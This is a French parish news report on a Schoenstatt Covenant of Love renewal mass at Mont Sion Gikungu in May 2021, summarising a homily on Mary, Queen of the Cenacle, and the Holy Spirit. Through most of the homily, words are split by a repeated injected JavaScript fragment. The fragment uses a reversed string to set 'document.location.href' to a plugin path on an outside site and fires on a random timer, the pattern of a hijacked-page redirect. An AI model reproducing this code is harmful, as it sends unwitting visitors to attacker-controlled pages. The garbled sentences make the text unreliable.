C’est déjà une bonne habitude que le renouvellement de l’Alliance d’amour soit célébré solennellement à Mont Sion Gikungu. C’est ainsi que ce mardi 18 mai 2021, une messe a été célébrée pour cette fête si chère pour la famille de Schoenstatt. Il y avait une grande foule et la messe a été présidée par le Père Jean Bosco HABONIMANA accompagné du Père Floribert KANEZA, Père Jean Bernard MAZURU, Père Herménégilde COYITUNGIYE, le Père Christian BIRINGANINE, ainsi que le diacre Japhet SIMBIZI.
Dans son homélie, le Père Jean Bosco, a dit que nous sommes rassemblés ce soir pour renouveler l’Alliance d’Amour en ce mois de mai. Le mois dédié à la Sainte Vierge Marie. Nous sommes aussi au cénacle où nous nous préparons à la Pentecôte. Nous sommes dans la prière comme les apôtres avec la Vierge Marie à la chambre haute. Ainsi, il a aimé que nous méditions sur la Vierge Marie, Reine du cénacle. En effet, la Vierge Marie, après avoir été enveloppée par l’Esprit Saint et la Puissance divine, elle a conçu le Fils de Dieu, puis elle est allée chez sa cousine Elisabeth. C’est l’Esprit Saint qui lui a inspiré d’y aller pour l’aider. L’Esprit Saint a toujours était avec la Vierge Marie avant, pendant et après la mort de Jésus. C’est l’Esprit Saint qui l’a accompagnée dès l’Enfance de Jésus jusqu’à la fortifier sous la croix. Et, la Vierge Marie a soutenu les apôtres qui se cachaient dans la chambre haute jusqu’au jour de Pentecôte. C’est pourquoi nous la vénérons comme Reine du Cénacle. Mais aussi, Elle a été toujours avec les apôtres avant l’avènement du Saint Esprit et après l’avènement du Saint Esprit. A leur tour, les apôtres sont allés annoncer la Parole de Dieu avec toute force, la force qu’ils ont reçue de l’Esprit Saint. Comme Jésus leur avait promis de rester avec eux jusqu’à la fin des temps.
Dans la première lecture de ce jour, saint Paul prêche l’Evangile sans peur. Selon lui, la mort ne lui fait pas peur car il sait que sa tâche d’annoncer la parole de Dieu n’est pas facile. Saint Paul montre son humilité mais aussi la bravoure d’enseigner aux juifs et aux grecs publiquement, et cela par la force de l’Esprit Saint. Ce dernier lui a même révélé ce qu’il va endurer dans les jours à venir. C’est ainsi qu’il a pris la route pour aller prêcher l’Evangile à Rome où il sera finalement tué comme martyr du Christ. Cela vaut aussi pour les autres apôtres. Car partout où ils sont passés, mainte fois, ils ont été frappés, injuriés, anéantis et finalement tués. Ce qui comptait pour eux c’est que la Bonne Nouvelle soit annoncée partout, la mort ne leur faisait pas peur. Et sans toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doute que la Vierge Marie les a toujours soutenus dans sa prière pour que le Saint Esprit reste toujours avec eux.
Quant à nous, nous avons aussi reçu l’Esprit Saint le jour de notre baptême et de confirmation. Nous avons reçu ses toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons, néanmoins, des fois, ils sont engloutis par le péché. Nous nous laissons emporter par le péché et il nous est difficile d’accomplir la volonté de Dieu. Nous ne nous laissons pas guider par l’Esprit Saint. Nous savons que Schoenstatt nous invite à vivre la sainteté du quotidien. C’est-à-dire accomplir bien et fidèlement nos tâches ordinaires et quotidiennes, pour la plus grande gloire de Dieu. Pour cela, entant que Schoenstattiens (nes), nous avons notre modèle Joseph Engling qui nous enseigne à vivre la sainteté du quotidien dans des choses simples ordinaires, accomplies d’une façon extraordinaire. Pour un élève ou un étudiant, il faut très bien étudier et ne pas tricher pendant les examens. Pour un commerçant, c’est la même chose, il faut le faire sans magouille ni tricherie dans la balance et les prix ; un travailleur de l’Etat toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit bien travailler avec amour pour recevoir le fruit de son travail ; etc.
Joseph Engling nous a enseigné aussi comment vivre le mois de mai en offrant les belles roses à la Vierge Marie. Les roses en provenance de nos sacrifices. Si nous sommes des vrais Schoenstattiens(nes) nous devons suivre cet exemple. Car ce mois de mai devrait être pour nous un mois de grandes contributions au capital de grâce au sanctuaire.
Pour que Dieu soit loué dans notre vie, nous devons être ce que Jésus demande à nous : être les siens. Et cela sera réaliser si nous nous abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnons à l’Esprit Saint pour qu’Il nous accompagne. Rappelons-nous que nous avons notre Mère, c’est Elle qui demande pour nous l’Esprit Saint, comme Elle l’a fait aux apôtres quand ils étaient au cénacle les portes verrouillées par peur des juifs. Elle demande aussi pour nous l’Esprit Saint. Or l’Esprit Saint ne vient pas là où il y a le péché, le désordre, la haine, la jalousie, la division, …. Il siège là où il y a l’amour, la lumière, le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don, la paix, l’entraide, … La Vierge Marie, l’Epouse du Saint Esprit, nous enseigne comment nous devons louer le Seigneur et être obéissants à l’Esprit Saint comme Elle. Celui qui a reçu les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons du Saint Esprit œuvre dans la lumière et agit en personne de bonne décision.
Il y a des fois où on toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit prendre décision en méditant sur la volonté de Dieu. Il nous faut toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc écouter l’Esprit Saint qui parle dans notre cœur pour être son instrument. La Vierge Marie est l’exemple d’être un instrument de Dieu. Si nous nous abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnons à l’Esprit Saint, un jour nous prierons comme en demandant à Dieu de se rapprocher de Lui au ciel car nous aurions déjà terminé notre mission. Mais quand même, en attendant ce jour de partir chez Lui nous devons le louer en faisant bien ce que nous devons faire comme responsabilité nous confiée.
Nous qui sommes ici aujourd’hui, comme l’a été le jour du premier Pentecôte que cela nous arrive le jour de Pentecôte prochain : que les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons du Saint Esprit nous renouvelle dans notre vie spirituelle et sociale. Jusque ce samedi quand nous allons terminer la neuvaine répétons: Seigneur envoie ton Esprit qu’Il renouvelle la face la terre (Mukama rungika Mutima wawe agire vyose bishasha). Que la face de la terre se renouvelle par l’action de l’Esprit Saint. Si le but de Schoenstatt est de renouveler le monde et de former l’homme nouveau, c’est seulement l’Esprit Saint qui va nous aider. Demantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons alors à la Sainte Vierge Marie, Reine du cénacle de nous ouvrir les cœurs pour recevoir l’Esprit Saint afin de nous délier de ces problèmes et péchés qui engloutissent le monde actuel. Amen.
Après l’homélie, le prédicateur à inviter les chrétiens présents à se préparer pour offrir le capital de grâce et c’est le rite qui a suivi, et après la messe a suivi son rythme norme.
DUSENGEYEZU Léon